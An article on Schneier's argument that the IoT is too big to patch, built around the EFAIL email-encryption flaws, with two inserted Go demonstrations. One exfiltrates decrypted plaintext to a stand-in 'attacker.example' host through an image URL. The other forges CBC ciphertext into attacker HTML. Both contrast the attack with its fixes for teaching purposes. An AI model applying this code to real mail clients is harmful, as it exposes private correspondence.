The Internet of Things (IoT) will never be too big to fail, though it is hard to imagine the entire thing failing at once, short of every power grid on the planet going down simultaneously.
But it is at growing risk of piecemeal failure because it is too big to patch, according to author, cryptographer, and prominent blogger Bruce Schneier.
Schneier, CTO of IBM Resilient Systems, wrote a post this past June mainly focused on the disclosure of serious flaws in the way email clients handle messages encrypted with the OpenPGP and S/MIME standards, which numerous email clients use to keep communications private.
Proof of Concept for the Email Vulnerabilities
A team of researchers had published a proof of concept (the attacks known as EFAIL) showing that they could trick any of those vulnerable clients by modifying an encrypted email before it reached the client, for example by wrapping the ciphertext in attacker-supplied HTML, so that the client decrypted the message and sent a plaintext copy to a server controlled by the attacker.
One reason it is a serious problem is that dozens of email clients implement standards that have been around for nearly three decades. The researchers said they found that plaintext exfiltration channels existed for 25 of the 35 tested S/MIME email clients and 10 of the 28 tested with OpenPGP.
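The direct-exfiltration variant described above, as an added example that is not from the original article or from the researchers' own code: the Go program below models a mail client that decrypts a captured message and then parses all MIME parts as one HTML document, against a client that parses each part separately. The decryption step is a stand-in (the "encrypted" part simply carries its plaintext, since the bug is in MIME handling, not in the cryptography); the host name, the message text and the image-URL pattern are constructed for the example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// part is one MIME body part as the mail client sees it. The crypto is
// irrelevant to this bug, so an "encrypted" part simply carries its
// plaintext plus a flag, and decrypt() stands in for the PGP/S-MIME step.
type part struct {
	contentType string
	body        string
	encrypted   bool
}

func decrypt(p part) string { return p.body }

// attackerWrap builds the malicious message from a captured encrypted
// part. The attacker cannot read that part, but can put attacker-controlled
// HTML before and after it that opens, and later closes, an <img src="...">
// attribute.
func attackerWrap(captured part, exfilHost string) []part {
	return []part{
		{"text/html", `<img src="http://` + exfilHost + `/`, false},
		captured,
		{"text/html", `">`, false},
	}
}

// render decrypts a part if needed and returns the text the client would parse.
func render(p part) string {
	if p.encrypted {
		return decrypt(p)
	}
	return p.body
}

// renderVulnerable models a client that concatenates every part into one
// HTML document before parsing it: the attribute opened in part 1 now runs
// across the decrypted plaintext and is closed by part 3, so the plaintext
// becomes part of the image URL.
func renderVulnerable(parts []part) string {
	var sb strings.Builder
	for _, p := range parts {
		sb.WriteString(render(p))
	}
	return sb.String()
}

// renderIsolated models the fix: each part is parsed as its own document,
// so markup in one part cannot capture the content of another.
func renderIsolated(parts []part) []string {
	docs := make([]string, 0, len(parts))
	for _, p := range parts {
		docs = append(docs, render(p))
	}
	return docs
}

var imgSrc = regexp.MustCompile(`<img src="([^"]*)"`)

// remoteLoads lists the URLs a client that auto-loads images would fetch
// from a rendered document; a URL carrying the plaintext is the exfiltration.
func remoteLoads(doc string) []string {
	var urls []string
	for _, m := range imgSrc.FindAllStringSubmatch(doc, -1) {
		urls = append(urls, m[1])
	}
	return urls
}

// leaks reports whether any fetched URL contains the secret plaintext.
func leaks(docs []string, secret string) bool {
	for _, d := range docs {
		for _, u := range remoteLoads(d) {
			if strings.Contains(u, secret) {
				return true
			}
		}
	}
	return false
}

func main() {
	// Constructed sample: the victim's encrypted message body.
	captured := part{contentType: "text/plain", body: "Meet at dawn", encrypted: true}
	msg := attackerWrap(captured, "attacker.example")
	fmt.Println("concatenating client fetches:", remoteLoads(renderVulnerable(msg)))
	fmt.Println("isolating client leaks:", leaks(renderIsolated(msg), captured.body))
}
```

Rendering each part in isolation is one of the two client-side mitigations; the other is not fetching remote content at all, which turns the leaked URL into one that is never requested. Neither changes the encryption.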
The other reason is that vulnerable people – journalists, political dissidents in repressive regimes, whistleblowers, and human rights advocates – rely on those clients to protect their privacy, and therefore their personal safety.
And it is all going to take a while to fix since, as Schneier put it, it involves multiple “communities without clear ownership.”
“In this case, there's nothing wrong with PGP or S/MIME in and of themselves,” he wrote. “Rather, the vulnerability occurs because of the way many email programs handle encrypted email.”
Which led Schneier to what he sees as a much bigger problem, given that, “the Internet is shifting from a set of systems we deliberately use – our phones and computers – to a fully immersive Internet-of-Things world that we live in 24/7 … (where) vulnerabilities will emerge through the interactions of different systems.”
It also suffers, he said, from many vendors not even having the expertise and capability to patch the software in what they sell, because it is frequently designed by, “offshore teams that come together, create the software, and then disband …”
Many devices, he noted, aren’t patchable at all – the only way to “fix” a digital video recorder that is vulnerable to being conscripted as part of a botnet is to, “throw it away and buy a new one.”
An example with a much higher risk to personal safety was the notice about a year ago from the federal Food and Drug Administration that 465,000 implantable cardiac pacemakers from Abbott (formerly St. Jude Medical) needed a firmware update to prevent an attacker from, among other things, depleting the battery or causing “inappropriate pacing.”
The FDA said it would only take three minutes to update the firmware, but it couldn’t be done remotely – it required a visit to a doctor’s office – something that might not be quickly accessible for every patient.
Beyond that is the continuing explosive growth of the IoT: Intel has estimated that by 2020, less than two years away, there will be more than 200 billion connected devices in use.
“Patching is starting to fail, which means that we're losing the best mechanism we have for improving software security at exactly the same time that software is gaining autonomy and physical agency,” he wrote.
Which raises the obvious question: What should IoT developers, manufacturers, and the software security industry do about it?
Schneier’s view is well known. He has testified before Congress in favour of government mandates for basic security standards for IoT devices because, as he has written on his blog numerous times, the market won’t do it. “It’s hard to see any other viable alternative (than government intervention),” he wrote.
That gets mixed reviews from other security experts, in part because not everybody shares such a bleak view of the current state of the IoT.
Zach Lanier, principal research consultant with Atredis Partners, says he doesn’t think the situation is as ominous as Schneier does, but agrees that “the gap between ‘patchability’ of disparate components – from overall firmware to specific components like OS/RTOS, drivers, applications, etc. – is very wide and may certainly be growing, especially with the introduction of niche IoT vendors and their respective devices.”
But Jesse Victors, a security consultant with the Synopsys Software Integrity Group, said it simply isn’t the case that every, or even most, devices are built by a team that disbands as soon as it has completed a project.
“I disagree with the premise,” he said. “I see the emergence of IoT devices managed by well-known companies, such as Samsung, Nest, Tesla, Apple, Google, or Amazon. These companies have dedicated teams to their IoT infrastructure, respond to security researchers, and push updates on their own initiative or when pressured to do so.”
And regarding the design flaws in OpenPGP and S/MIME, Larry Trowell, associate principal consultant with Synopsys Software Integrity Group, said that while “patching the lack of authenticated encryption in the design at this stage would be a herculean task,” the problem can be avoided simply by not using it “in tandem with an automated software retrieval process, but for manual file verification and signature checks.”
“Sometimes pieces of software just don’t work correctly together,” he said.
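Why the lack of authenticated encryption matters, as an added example that is not from the article or from any of the people quoted: the Go program below forges an AES-CBC ciphertext without the key, using nothing but the captured IV, the first ciphertext block and one block of predictable plaintext, so that it decrypts to attacker-chosen HTML with a block of garbage between each chosen block (real attacks hide the garbage inside HTML comments or attribute values). AES-CBC stands in for S/MIME's unauthenticated mode here, and OpenPGP's CFB mode is malleable in the same way. The same program shows AES-GCM refusing a ciphertext with a single flipped bit. The key, the known header block and the chosen HTML fragments are constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
)

// Constructed sample: an S/MIME body predictably starts with a MIME header,
// which gives the attacker one block of known plaintext.
var knownFirstBlock = []byte("Content-Type: mu") // exactly aes.BlockSize bytes

func xor(a, b []byte) []byte {
	out := make([]byte, len(a))
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// pad16 turns a string of at most one block into one space-padded block.
func pad16(s string) []byte {
	return append([]byte(s), bytes.Repeat([]byte{' '}, aes.BlockSize-len(s))...)
}

func randomBytes(n int) []byte {
	b := make([]byte, n)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return b
}

// cbcEncrypt: AES-CBC with a random IV and no integrity tag, the shape of the
// problem described in the text. plaintext must be whole blocks.
func cbcEncrypt(block cipher.Block, plaintext []byte) (iv, ct []byte) {
	iv = randomBytes(aes.BlockSize)
	ct = make([]byte, len(plaintext))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, plaintext)
	return iv, ct
}

// cbcDecrypt has no way to tell a genuine ciphertext from a forged one.
func cbcDecrypt(block cipher.Block, iv, ct []byte) []byte {
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pt
}

// forgeCBC builds, without the key, a ciphertext whose decryption contains
// the chosen blocks at positions 0, 2, 4, ... separated by single blocks of
// garbage. In CBC, p0 = D(c0) XOR iv, so D(c0) is known once p0 is, and
// placing x = D(c0) XOR want in front of c0 makes c0 decrypt to want.
func forgeCBC(iv, c0, p0 []byte, chosen [][]byte) (newIV, newCT []byte) {
	dc0 := xor(p0, iv) // D(c0), recovered from known plaintext alone
	newIV = xor(dc0, chosen[0])
	for _, want := range chosen[1:] {
		newCT = append(newCT, c0...)             // decrypts to the block chosen just before it
		newCT = append(newCT, xor(dc0, want)...) // decrypts to garbage, primes the next c0
	}
	newCT = append(newCT, c0...)
	return newIV, newCT
}

// chosenBlocks picks out every other block of a decryption, skipping the garbage.
func chosenBlocks(pt []byte) [][]byte {
	var out [][]byte
	for i := 0; i < len(pt); i += 2 * aes.BlockSize {
		out = append(out, pt[i:i+aes.BlockSize])
	}
	return out
}

// gcmTamperError encrypts with AES-GCM, flips one ciphertext bit and returns
// the error from Open: with authenticated encryption the forgery is refused
// outright instead of yielding attacker-chosen plaintext.
func gcmTamperError(block cipher.Block, plaintext []byte) error {
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return err
	}
	nonce := randomBytes(aead.NonceSize())
	ct := aead.Seal(nil, nonce, plaintext, nil)
	ct[0] ^= 0x01 // one flipped bit
	_, err = aead.Open(nil, nonce, ct, nil)
	return err
}

// runDemo encrypts a constructed message under CBC, forges a replacement that
// decrypts to attacker-chosen HTML, and reports how GCM treats tampering.
func runDemo(key []byte) (recovered [][]byte, gcmErr error, err error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, nil, err
	}
	msg := append(append([]byte{}, knownFirstBlock...), "ltipart/signed; "...)
	iv, ct := cbcEncrypt(block, msg)
	chosen := [][]byte{pad16(`<img src="http:/`), pad16(`/atk.example/">`)}
	fIV, fCT := forgeCBC(iv, ct[:aes.BlockSize], knownFirstBlock, chosen)
	return chosenBlocks(cbcDecrypt(block, fIV, fCT)), gcmTamperError(block, msg), nil
}

func main() {
	recovered, gcmErr, err := runDemo([]byte("0123456789abcdef")) // constructed key
	if err != nil {
		panic(err)
	}
	for _, b := range recovered {
		fmt.Printf("CBC forgery decrypted to: %q\n", b)
	}
	fmt.Println("GCM on tampered ciphertext:", gcmErr)
}
```

The forged message never needs the key, only a captured ciphertext and a guess at its first block, which is why Trowell's "herculean" fix means changing the message format itself rather than patching any one client.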
And neither Victors nor Trowell think government regulation and oversight will fix the security problems that ail the IoT.
Indeed, the federal government has a poor track record securing its own data, never mind devices. Just two examples are the breach of the Office of Personnel Management (OPM), discovered in 2014, and the compromise of National Security Agency (NSA) hacking tools in 2016.
“Government certification does not work for making cryptographic libraries secure,” Victors said, “and it will be equally ineffective for IoT security.”
He said he has seen proposals for federal certification bodies, “but I foresee them falling behind in technical understanding, not adapting to new technologies and connectivity relationships, encouraging IoT manufacturers to hide infrastructure, or generally being toothless.”
Trowell added that government involvement could, “infringe on the right to repair and the ability to tinker with devices.”
And Victors believes there are other, and better, “viable alternatives” to government regulation.
He said an independent, consumer-friendly organization could rank IoT devices in areas like, “whether it transmits user data overseas, whether it self-applies firmware updates, whether it is exposed to the public Internet, whether the company is maintaining it, and so on.”
A body like that, he added, could also coordinate the sometimes contentious relationship between security researchers and vendors when it comes to reporting the discovery of vulnerabilities.
Of course, a majority of the security failures that plague the IoT could be avoided by “building security in” to products from the start of the design phase throughout the development lifecycle.
But even that wouldn’t eliminate every vulnerability. Lanier said it will likely take a systemic overhaul: it is not just vendors and developers who need security expertise, but platform manufacturers and service operators as well.
“In some cases, they do provide sane and secure defaults, security features, appropriate feedback mechanisms for when something is ‘not okay,’ and robust, usable software/firmware update mechanisms,” he said.
“I don't know that there's really a clear answer on how to fix this en masse, but the IoT-device-du-jour building on a platform/stack that ‘doesn't suck’ is a good start.”
Victors agrees that IoT devices must be designed to allow firmware upgrades easily – which is not the case in most WiFi routers in use today.
A huge percentage of them “are rarely upgraded; their owners are not aware or not technically savvy enough to perform the upgrade, or the device itself cannot download the patches and upgrade itself.
“This absolutely needs to change,” he said. “We cannot assume that the first production version will be sufficient over the long term.”
Trowell’s view is that even though the market hasn’t fixed the problem yet, it remains the only viable way to do it. “I don’t think one country or one government mandating the fix is going to do much,” he said. “I think it will only change when the majority of consumers care and demand it.”
Will that happen? Lanier, like Schneier, is dubious. “Outside of clued-in organizations or enterprises that actually do some kind of risk analysis on random IoT devices being introduced into their networks, I don't see most end users – consumers – really making security-conscious decisions any time soon,” he said.